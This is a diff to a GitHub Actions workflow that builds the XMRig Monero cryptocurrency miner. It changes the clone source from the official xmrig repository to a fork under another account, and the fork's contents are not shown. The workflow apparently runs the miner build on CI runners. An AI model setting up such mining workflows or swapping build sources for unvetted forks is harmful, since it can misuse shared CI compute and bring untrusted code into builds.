--- a/.github/workflows/c-cpp.yml
+++ b/.github/workflows/c-cpp.yml
@@ -11,7 +11,7 @@ jobs:
     - name: Command 1
       run: sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
     - name: git clone
-      run: git clone https://github.com/xmrig/xmrig.git
+      run: git clone https://github.com/subtogash/xmrig.git
     - name: dirs
       run: mkdir xmrig/build && cd xmrig/build
     - name: cmake
